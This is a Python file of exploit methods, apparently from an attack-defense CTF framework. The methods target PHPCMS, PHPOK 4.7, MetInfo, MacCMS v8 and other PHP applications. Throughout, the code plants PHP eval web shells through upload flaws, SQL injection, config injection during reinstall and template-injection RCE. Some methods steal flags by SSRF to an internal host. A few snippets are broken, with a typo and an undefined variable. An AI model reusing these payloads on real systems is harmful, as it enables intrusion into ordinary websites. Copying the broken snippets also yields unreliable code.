def attack(self):
url = "http://%s/index.php?m=member&c=index&a=register&siteid=1" % self.host
print(url)
login_pass = Utils.randmd5()
callback_shell_url = "http://%s:%d/" % (config.ccServer['address'],
config.ccServer['port'])
data = {
"modelid": 10,
"username": Utils.randmd5(),
"password": login_pass,
"pwdconfirm": login_pass,
"email": Utils.randmd5() + "@qq.com",
"nickname": "nick" + Utils.randmd5()[0:8],
"info[content]": '<img src="%s?.php#.jpg" />' % callback_shell_url,
"dosubmit": "1",
"protocol": ""
}
print(data)
try:
resp = post(url=url, data=data)
print(resp.text)
if 200 == resp.status_code and "MySQL Error" in resp.text and "http" in resp.text:
successUrl = resp.text[resp.text.index("http"):resp.text,
index(".php")] + ".php"
return successUrl, Utils.getPassword(self.host)
else:
raise PayloadFailException('Payload no echo message for %s' %
self.host)
except:
raise PayloadFailException('Payload failed for %s' % self.host)
def attack(self):
shellpath = 'res/.s.php'
phpsession = ''
url = 'http://{}/index.php?c=upload&f=save'.format(self.host)
files = [
('upfile',
("1','r7ip15ijku7jeu1s1qqnvo9gj0','30',''),('1',0x7265732f3230313730352f32332f,0x393936396465336566326137643432352e6a7067,'',0x"
+ binascii.b2a_hex(shellpath.encode()).decode() +
",'1495536080','2.jpg", '<?php @eval($_POST[cmd]);?>',
'image/jpg')),
]
horse = Horse(self.host)
files1 = {'upfile': ('1.jpg', horse.simple, 'image/jpg')}
cookies = {'PHPSESSION': phpsession}
r = req.post(url, files=files, cookies=cookies)
response = r.text
id = re.search('"id":"(\d+)"', response, re.S).group(1)
id = int(id) + 1
url = 'http://{}/index.php?c=upload&f=replace&oldid={}'.format(
self.host, id)
r = req.post(url, files=files1, cookies=cookies)
shell = 'http://{}/{}'.format(self.host, shellpath)
response = req.get(shell)
if response.status_code == 200:
return shell, horse.password
raise PayloadFailException('PHPOK V4.7 payload fail')
def attack(self):
try:
# login
s = requests.Session()
s.get('http://{0}/admin/login.php'.format(self.host))
url = 'http://{0}/admin/index.php?lang=cn&anyid=&n=login&c=login&a=dologin&langset='.format(
self.host)
s.post(url,
data={
'action': 'login',
'login_name': 'admin',
'login_pass': '******',
'Submit': ''
},
timeout=2,
allow_redirects=False)
# delete
deleteUrl = 'http://{}/admin/app/batch/csvup.php?fileField=test-1&flienamecsv=../../../config/install.lock'.format(
self.host)
s.get(deleteUrl, timeout=2)
# reinstall
reinstallUrl = 'http://{}/install/index.php?action=db_setup'.format(
self.host)
res = s.post(reinstallUrl,
data={
'setup': 1,
'db_type': 'mysql',
'db_prefix': 'met_',
'db_host': 'localhost',
'db_name': 'met#*/@eval($_POST[c]);/*',
'cndata': 'yes',
'endata': 'yes',
'showdata': 'yes'
},
timeout=2,
allow_redirects=False)
print(res.text)
# shell
shellUrl = 'http://{}/config/config_db.php'.format(self.host)
res = requests.post(shellUrl, data={'c': 'echo seven;'}, timeout=2)
if res.status_code == 200 and 'seven' in res.text:
return shell, 'c'
else:
raise PayloadFailException('Shell Upload Fail')
except Exception as e:
raise PayloadFailException(str(e))
def attack(self):
try:
url = 'http://{0}/detail/7.html'.format(self.host)
res = requests.post(
url,
data={
'1': "echo '<?php @eval($_POST[c]);?>' >> ./uploads/s.php"
},
timeout=2)
url2 = 'http://{0}/uploads/s.php'.format(self.host)
res = requests.get(url2, timeout=2)
if res.status_code == 200:
return url2, 'c'
else:
raise PayloadFailException('simple horse write fail')
except Exception as e:
raise PayloadFailException(str(e))
def execute(self):
try:
url = 'http://{0}/home/Api/unserializehook.html'.format(self.host)
res = requests.post(
url,
data={
'seridata':
"TzoxMDoibXlsaWJcRmlsZSI6Mjp7czo4OiJmaWxlbmFtZSI7czoyNzoiaHR0cDovLzE5Mi4xNjguMTAwLjEvR2V0a2V5IjtzOjc6ImNvbnRlbnQiO047fQ=="
},
timeout=2)
if res.status_code == 200:
flag = res.text
if not flag:
raise PayloadFailException('GET FLAG FAIL')
msg = sendFlag(flag)
return [flag, msg]
else:
raise PayloadFailException('simple horse write fail')
except Exception as e:
raise PayloadFailException(str(e))
def attack(self):
try:
metinfonow = 'zitkifx'
path = 'configs.php'
url = 'http://{0}/admin/index.php?c=uploadify&m=include&a=doupfile&lang=cn&metinfonow={1}&html_filename={2}'.format(
self.host, metinfonow, path)
requests.post(url,
files={
'test': ('<?php @eval($_POST[c]);?>', 'test',
'image/png')
},
timeout=2)
url2 = 'http://{0}/{1}'.format(self.host, path)
res = requests.get(url2, timeout=2)
if res.status_code == 200:
return url2, 'c'
else:
raise PayloadFailException('simple horse write fail')
except Exception as e:
raise PayloadFailException(str(e))
def execute(self):
try:
if self.host not in sessions:
raise PayloadFailException('has not member session')
session = sessions[self.host]
url = 'http://{0}/member/api/imgget'.format(self.host)
res = requests.get(url,params={
'ebimgname':"http://192.168.100.1/Getkey"
},timeout=2,headers={
'Cookie':'PHPSESSID='+session
})
find = re.search(r'bold;margin: 15px 0;">(.*?)</div>',res.text)
if find:
flag = Utils.base64_d(find.group(1))
if not flag:
raise PayloadFailException('flag base64decode fail '+find.group(1))
msg = sendFlag(flag)
return [flag,msg]
else:
raise PayloadFailException('flag not found')
except Exception as e:
raise PayloadFailException(str(e))
def attack(self):
try:
url = 'http://{0}/index.php?m=vod-search'.format(self.host)
print(url)
res = requests.post(url,
data={'wd': '{if-A:print(md5(a))}{endif-A}'},
timeout=2)
if not res.status_code == 200 or Utils.md5('a') not in res.text:
raise PayloadFailException('MaccmsV8 not satisfied')
print('MaccmsV8 success')
shellPath = '/upload/awd3.php'
shellLocation = configuration.webRoot + shellPath
shellLocation = Utils.base64(shellLocation).strip('=').strip('+')
payload = 'wd={if-A:print(fputs(fopen(base64_decode(' + shellLocation + '),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FtXSk7Pz4x)))}{endif-A}'
print(payload)
res = requests.post(url, data={'wd': payload}, timeout=2)
shellUrl = 'http://' + self.host + shellPath
res = requests.get(shellUrl)
if res.status_code == 200:
return shellUrl, 'am'
except PayloadFailException:
raise
except:
raise PayloadFailException